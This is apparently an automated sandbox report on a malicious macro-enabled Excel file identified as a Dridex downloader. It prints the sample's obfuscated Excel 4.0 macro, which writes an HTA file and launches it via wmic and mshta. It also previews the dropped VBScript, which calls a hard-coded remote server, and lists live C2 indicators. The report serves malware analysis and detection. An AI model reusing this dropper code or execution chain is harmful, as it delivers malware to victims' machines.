http://157.230.250.107:8 | mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928246833.00000269D553C000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://157.230.250.10e | mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928246833.00000269D553C000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | low
https://api.cortana.ai | 7065FF96-0F32-40B3-B28E-F452FBC97932.0.dr | false | URL Reputation: safe | unknown
https://dataservice.o365filtering.compDy | EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://visio.uservoice.com/forums/368202-visio-on-devices | EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.dr | false | | high
https://staging.cortana.ai | 7065FF96-0F32-40B3-B28E-F452FBC97932.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/embed? | 7065FF96-0F32-40B3-B28E-F452FBC97932.0.dr | false | | high
https://augloop.office.com | EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.dr | false | | high
https://login.windows.net/common/oauth2/authorize018 | EXCEL.EXE, 00000000.00000003.801049819.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787311248.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.932505798.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742840890.000000000F88C000.00000004.00000001.sdmp | false | | high
http://157.230.250.107:8080/mfkrmotherfuckeru6y82saSM | mshta.exe, 00000011.00000003.857823332.00000269D552F000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928232600.00000269D552F000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://login.windows.net/common/oauth2/authorizelR | EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp | false | | high
https://login.windows.net/common/oauth2/authorizefic | EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp | false | | high

                                                                                                                                      Contacted IPs


                                                                                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
157.230.250.107 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | false

                                                                                                                                      General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 532311
Start date: 02.12.2021
Start time: 00:42:22
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 17s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 56449657.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@7/8@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 3
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.32.63, 52.109.8.23, 52.109.8.24
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

Time | Type | Description
00:44:46 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
00:44:48 | API Interceptor | 2x Sleep call for process: mshta.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

Match | Associated Sample Name / URL | Detection | Context
157.230.250.107 | 3762.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 56449657.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 08676789691.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 3762.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 55339.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 08676789691.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 55339.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | SecuriteInfo.com.Heur.8342.xls | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | SecuriteInfo.com.Heur.17052.xls | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | SecuriteInfo.com.Heur.8342.xls | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 57949616735.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 57949616735.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 44307.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 44307.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 77859564213.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 77859564213.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 1762311.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 1762311.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 88985.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
157.230.250.107 | 88985.xlsm | malicious | 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e

                                                                                                                                      Domains

                                                                                                                                      No context

                                                                                                                                      ASN

Match | Associated Sample Name / URL | Detection | Context
DIGITALOCEAN-ASNUS | 3762.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 56449657.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 08676789691.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 3762.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 55339.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 08676789691.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 55339.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | SecuriteInfo.com.Heur.8342.xls | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | SecuriteInfo.com.Heur.17052.xls | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | SecuriteInfo.com.Heur.8342.xls | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 57949616735.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 57949616735.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 44307.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 44307.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 77859564213.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 77859564213.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 1762311.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 1762311.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 88985.xlsm | malicious | 157.230.250.107
DIGITALOCEAN-ASNUS | 88985.xlsm | malicious | 157.230.250.107

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      No context

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\ProgramData\vqcMnINBAOOJC.rtf
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):5040
                                                                                                                                      Entropy (8bit):5.095389504560149
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:rFsnLfSGtt691e7fDTPnSQ473YuzXyIHmXPYi/mbWCj4VR5VLqRDbHTn8uDqRcdr:rFsLfpttaw7fnPnjwlX7mXQCmbjmVADX
                                                                                                                                      MD5:9FAED765B90101028AAAD70C3A104FAA
                                                                                                                                      SHA1:862941EF3F09768C1B1D9505668601B482E0C709
                                                                                                                                      SHA-256:9426C84906FE083E7DD95791AD9C24FC841C2A3EFE78595675AA489DBADFFF32
                                                                                                                                      SHA-512:EFE9EA33D054CC121291250D8F2A2437C08E68CE506127F6BEE185F8C79D6E6B061819D6A718BCE558724BFD56910C8FEF508A39986A743CC39FE9BB256D4013
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\vqcMnINBAOOJC.rtf, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >....Function dqbzESpSEZBpIx()..Set wCESFvAdFB = CreateObject("" & "" & "MSX" & Chr(77) & "L2." & Chr(83) & "erv" & "erX" & Chr(77) & "LH" & "" & "" & "" & Chr(84) & Chr(84) & Chr(80) & Chr(46) & "6.0" & "")..wCESFvAdFB.Open "" & "" & "GE" & "" & "" & Chr(84), Chr(104) & Chr(116) & "tp:" & "//" & "15" & "" & "7." & "" & "230" & ".2" & Chr(53) & "" & "" & "" & "0.1" & Chr(48) & Chr(55) & Chr(58) & Chr(56) & Chr(48) & "80/" & Chr(109) & "fkr" & Chr(109) & "oth" & "" & "er" & "fu" & Chr(99) & Chr(107) & Chr(101) & "ru6" & Chr(121) & "82" & "sa" & "ssw" & Chr(104) & Chr(111) & Chr(114) & "ehf" & Chr(57) & Chr(101), False ..wCESFvAdFB.SetRequestHeader "User-Agent","lube"..wCESFvAdFB.Send..End Function....Function ytBKmPfovFxXtTw()..gwYKXuaDzh = "wm
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7065FF96-0F32-40B3-B28E-F452FBC97932
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):140163
                                                                                                                                      Entropy (8bit):5.358157876379636
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:bcQIfgxrBdA3gBwtnQ9DQW+zCb4Ff7nXbovidXiE6LWmE9:xuQ9DQW+zJXfH
                                                                                                                                      MD5:4C38F7C7B239A9C116B88D9E641FDC6E
                                                                                                                                      SHA1:62082E300CA9A23599AD150AB2F9FC4A59AE9D30
                                                                                                                                      SHA-256:B5DC29AE868C34102DA8BA258C64782A6084D12B91BEAD8CC919DF28071943CA
                                                                                                                                      SHA-512:734527E01096AC3DC4854FE8805B116F3718C4F01872EA0532DCCBA5B7F619B12D6E91C748F4E608E45F616DDC8CA6F0D8FCF9A6AE6F3BEB9BF3FA4C5C6F2379
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-01T23:43:16">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\22B0DE4E.png
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:PNG image data, 960 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):95290
                                                                                                                                      Entropy (8bit):7.964656092224063
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:Z1M1Jci8gZKV4LZqcJ9D/ufmtLPLVNJoCH0/UN8EDmPmPH9999999GAdqT99999b:Z1M16TguaNTLGmtLfJ3hN8DqH999999q
                                                                                                                                      MD5:D3C811B819094DAD38EAECB1DFFC8E50
                                                                                                                                      SHA1:712F71711F017D47A447BF96C6D35686AB0C64FC
                                                                                                                                      SHA-256:CF5F75B2DEBB0A1D6BA1C0131DAD4FA7BC6E117CB525D853F5697EC0830615C0
                                                                                                                                      SHA-512:D181328D708F185A3AB810687D0034A56D5C5EF85D990623032FF3259A7B40BB448F5B1E17C9AE57300F6222B829FF0F685463DC889AC48F25F7B629916DE29B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      C:\Users\user\Desktop\1E850000
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):132860
                                                                                                                                      Entropy (8bit):7.947363835661108
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:nUCmEb0PoNGJL71M16TguaNTLGmtLfJ3hN8DqH9999999HqT99999999WnsAGanQ:n9bWoN8LC+kLGmxfJ3hNci3On
                                                                                                                                      MD5:538D614D34A75DD9A37972FC29CB7D6C
                                                                                                                                      SHA1:F76CA6CFF38F304FD6CF7B924D674BB234591EEC
                                                                                                                                      SHA-256:AE2D713D8B6F866C2AF1D33063F6E3D34011718B8A353828DDF19B3E82900A1D
                                                                                                                                      SHA-512:14E8BCFF820EDB7B0F84C08DA5C9E236EC80CCBE3E67DED9B57C00EDBD9877D1703C5707D2897C3AEB06BB2DA22DEB0B33C98712490D83B979C33EA5AC08D365
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      C:\Users\user\Desktop\1E850000:Zone.Identifier
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26
                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                      C:\Users\user\Desktop\56449657.xlsm (copy)
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):132860
                                                                                                                                      Entropy (8bit):7.947363835661108
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:nUCmEb0PoNGJL71M16TguaNTLGmtLfJ3hN8DqH9999999HqT99999999WnsAGanQ:n9bWoN8LC+kLGmxfJ3hNci3On
                                                                                                                                      MD5:538D614D34A75DD9A37972FC29CB7D6C
                                                                                                                                      SHA1:F76CA6CFF38F304FD6CF7B924D674BB234591EEC
                                                                                                                                      SHA-256:AE2D713D8B6F866C2AF1D33063F6E3D34011718B8A353828DDF19B3E82900A1D
                                                                                                                                      SHA-512:14E8BCFF820EDB7B0F84C08DA5C9E236EC80CCBE3E67DED9B57C00EDBD9877D1703C5707D2897C3AEB06BB2DA22DEB0B33C98712490D83B979C33EA5AC08D365
                                                                                                                                      Malicious:true
                                                                                                                                      C:\Users\user\Desktop\~$56449657.xlsm
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):165
                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                      MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                      SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                      SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                      SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                      Malicious:true
                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      \Device\ConDrv
                                                                                                                                      Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):160
                                                                                                                                      Entropy (8bit):5.065985063226091
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgjWLyWAFJQAiveyn:Yw7gJGWMXJXKSOdYiygKkXe/egq+eAin
                                                                                                                                      MD5:7B23232078E37BFB12D43891AD733D69
                                                                                                                                      SHA1:3A6281C7F8A9AFC2183EEBEDA042268077D4BCB0
                                                                                                                                      SHA-256:5666ED71FA333DDB1DD08947451F5722D3D872EC192A9434B730A652CC26F09A
                                                                                                                                      SHA-512:4DEB5195B4DB01D2396AD4BF773D05D0D899DEA682ED63563A9664A02F777AABDD5B0B36B5BDF8A4A9B17C63B5C10B04F2C6501B58DBBB9CC5A70BA67AC2B1E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 1332;...ReturnValue = 0;..};....

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                      Entropy (8bit):7.945199506900952
                                                                                                                                      TrID:
                                                                                                                                      • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                                      • ZIP compressed archive (8000/1) 8.08%
                                                                                                                                      File name:56449657.xlsm
                                                                                                                                      File size:134569
                                                                                                                                      MD5:3ff89734f2c6a54fe79464e94151ce10
                                                                                                                                      SHA1:4b4f24fec70071de89a76b70e12394a56efdcf62
                                                                                                                                      SHA256:9818931574ed09e96ddc907c47907cfc6fbfad3f6bc3fca1c0f3b210c1d458f4
                                                                                                                                      SHA512:486a2c9268ebe62ead6582c72332eb6d32e8a74917514f5baf3e97e131fd41849e82dd41c17c3a0da37c1be8801999252da09b5a328307a74117837a053d0344
                                                                                                                                      SSDEEP:3072:TTakgjRg1M16TguaNTLGmtLfJ3hN8DqH9999999HqT99999999WnsAGanOp1g0dD:TTujB+kLGmxfJ3hNci3Ozg0dD

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:74ecd0e2f696908c

                                                                                                                                      Static OLE Info

                                                                                                                                      General

                                                                                                                                      Document Type:OpenXML
                                                                                                                                      Number of OLE Files:1

                                                                                                                                      OLE File "56449657.xlsm"

                                                                                                                                      Indicators

                                                                                                                                      Has Summary Info:
                                                                                                                                      Application Name:
                                                                                                                                      Encrypted Document:
                                                                                                                                      Contains Word Document Stream:
                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                      Flash Objects Count:
                                                                                                                                      Contains VBA Macros:

                                                                                                                                      Macro 4.0 Code

                                                                                                                                      1,18,=V50-F6
                                                                                                                                      3,18,=W8+F54
                                                                                                                                      4,18,=F52-R52
                                                                                                                                      5,18,=M59*E74
                                                                                                                                      6,18,=C29+U71
                                                                                                                                      8,18,=R100*L9
                                                                                                                                      9,18,=Z67+O77
                                                                                                                                      11,18,=X48*C17
                                                                                                                                      13,18,=K58*O57
                                                                                                                                      14,18,=ALERT("Error! Sendi" & CHAR(110) & "g r" & CHAR(101) & CHAR(112) & "ort to" & CHAR(32) & CHAR(77) & "icrosoft...")
                                                                                                                                      15,18,=B83+L73
                                                                                                                                      18,18,=L23+Y18
                                                                                                                                      22,18,=B90*Q80
                                                                                                                                      23,18,=D52*E76
                                                                                                                                      28,18,=FOPEN("C:\ProgramData\vqc" & CHAR(77) & "" & CHAR(110) & "INBAOOJC.rtf", 3)
                                                                                                                                      29,18,=D22-H51
                                                                                                                                      30,18,=Z88+Z76
                                                                                                                                      34,18,=G59+F40
                                                                                                                                      35,18,=J34+I60
                                                                                                                                      36,18,=D47-O96
                                                                                                                                      37,18,=Y65+N9
                                                                                                                                      39,18,=FOR.CELL("xjoEoryTpTNoFl",Sheet1!BO155:DD274, TRUE)
                                                                                                                                      40,18,=O38*C99
                                                                                                                                      43,18,=Q78-O42
                                                                                                                                      47,18,=Z81-X87
                                                                                                                                      48,18,=D88-N75
                                                                                                                                      49,18,=R87-L37
                                                                                                                                      52,18,=FWRITE(0,CHAR(xjoEoryTpTNoFl))
                                                                                                                                      54,18,=B9+I27
                                                                                                                                      56,18,=R89+H18
                                                                                                                                      57,18,=J57-V53
                                                                                                                                      58,18,=B22+N73
                                                                                                                                      59,18,=J99+Q26
                                                                                                                                      60,18,=V32-X41
                                                                                                                                      61,18,=Y15*R96
                                                                                                                                      62,18,=H50*G76
                                                                                                                                      63,18,=M15+L19
                                                                                                                                      64,18,=W90*L23
                                                                                                                                      65,18,=O58*C45
                                                                                                                                      66,18,=X24+L19
                                                                                                                                      67,18,=NEXT()
                                                                                                                                      69,18,=V87-J28
                                                                                                                                      71,18,=R46*B12
                                                                                                                                      73,18,=O56*H44
                                                                                                                                      75,18,=K31+T58
                                                                                                                                      77,18,=R17*C34
                                                                                                                                      78,18,=U67+J13
                                                                                                                                      79,18,=F63*E65
                                                                                                                                      80,18,=EXEC("wmic proces" & CHAR(115) & CHAR(32) & "ca" & CHAR(108) & "l " & CHAR(99) & CHAR(114) & "eate " & CHAR(34) & CHAR(109) & "sh" & CHAR(116) & CHAR(97) & " C" & CHAR(58) & "\ProgramD" & CHAR(97) & "ta\vqcMnINBAOOJC.rt" & CHAR(102) & "" & CHAR(34))
                                                                                                                                      82,18,=W93+E13
                                                                                                                                      83,18,=U57*U52
                                                                                                                                      84,18,=U46-A41
                                                                                                                                      89,18,=T33-T25
                                                                                                                                      91,18,=RETURN()
                                                                                                                                      

                                                                                                                                      Network Behavior

                                                                                                                                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2021 00:44:49.437407970 CET | 49826 | 8080 | 192.168.2.4 | 157.230.250.107
Dec 2, 2021 00:44:49.709111929 CET | 8080 | 49826 | 157.230.250.107 | 192.168.2.4
Dec 2, 2021 00:44:49.709470987 CET | 49826 | 8080 | 192.168.2.4 | 157.230.250.107
Dec 2, 2021 00:44:49.711606979 CET | 49826 | 8080 | 192.168.2.4 | 157.230.250.107
Dec 2, 2021 00:44:49.982547998 CET | 8080 | 49826 | 157.230.250.107 | 192.168.2.4
Dec 2, 2021 00:44:50.373827934 CET | 8080 | 49826 | 157.230.250.107 | 192.168.2.4
Dec 2, 2021 00:44:50.428730011 CET | 49826 | 8080 | 192.168.2.4 | 157.230.250.107

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • 157.230.250.107:8080

                                                                                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49826 | 157.230.250.107 | 8080 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 00:44:49.711606979 CET | 8427 | OUT | GET /mfkrmotherfuckeru6y82sasswhorehf9e HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-US
User-Agent: lube
Host: 157.230.250.107:8080

Dec 2, 2021 00:44:50.373827934 CET | 8427 | IN | HTTP/1.1 200 OK
Server: nginx/1.15.12
Date: Wed, 01 Dec 2021 23:44:50 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 13
Connection: keep-alive
Data Raw: 68 69 20 63 6f 77 66 75 63 6b 65 72 73
Data Ascii: hi cowfuckers


                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Start time:00:43:14
                                                                                                                                      Start date:02/12/2021
                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                      Imagebase:0x1220000
                                                                                                                                      File size:27110184 bytes
                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:00:44:45
                                                                                                                                      Start date:02/12/2021
                                                                                                                                      Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf"
                                                                                                                                      Imagebase:0xa60000
                                                                                                                                      File size:391680 bytes
                                                                                                                                      MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:00:44:46
                                                                                                                                      Start date:02/12/2021
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff724c50000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
